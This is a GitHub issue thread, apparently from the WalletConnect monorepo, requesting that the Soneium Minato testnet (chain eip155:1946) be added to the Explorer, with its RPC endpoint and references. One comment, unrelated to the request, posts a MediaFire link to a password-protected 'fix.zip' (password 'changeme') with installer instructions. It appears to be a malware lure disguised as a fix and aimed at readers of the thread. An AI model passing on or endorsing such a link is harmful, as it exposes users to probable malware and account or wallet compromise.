### ISSUE TITLE
Add Soneium (testnet Minato) chain

### ISSUE THREAD

**Issue by Maar-io** [WalletConnect/walletconnect-monorepo#5314]
**Adding a new chain to the Explorer**
To get a new chain added to the Explorer, you will need to submit the following:

1. JSON-RPC spec for Wallets **(only if [one](https://docs.walletconnect.com/2.0/advanced/rpc-reference/ethereum-rpc) doesn't already exist)**. For more information, please review the Ethereum [JSON-RPC API docs]
ethereum-rpc

3. Write a [CASA namespace spec](https://github.com/ChainAgnostic/namespaces) if not already available for this namespace.
ethereum

4. **namespaces**:
eip:155

5. **chains**:
Minato [testnet] eip155:1946

6. **RPC endpoints**
Minato [testnet]: [https://rpc.minato.soneium.org](https://rpc.minato.soneium.org)

7. **[SLIP-0044](https://github.com/satoshilabs/slips/blob/master/slip-0044.md) coin type**:
60

**References**
- [ ] Source of RPC endpoints (e.g. RPC docs): [https://docs.soneium.org/docs/builders/tools/node-providers]
- [ ] Source of chainid: [https://github.com/ethereum-lists/chains/blob/master/_data/chains/eip155-1946.json]

**Additional context**
Add any other context here.

---

**Please note:**

**Registering a chain with the Explorer does not impact or improve the ability for wallets and dapps to support your chain.** It is simply a way for users to discover wallets and dapps that support your chain by:

- Browsing the [Chains List](https://docs.walletconnect.com/advanced/multichain/chain-list)
- Filtering results programmatically via the [Explorer API](https://docs.walletconnect.com/cloud/explorer)

**It is still up to wallets and dapps to provide concrete support for your chain once it is listed as part of the Explorer.**

- [x] I have read and understood the above clarification

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by justmortysmith** [comment]
The new chain works correctly
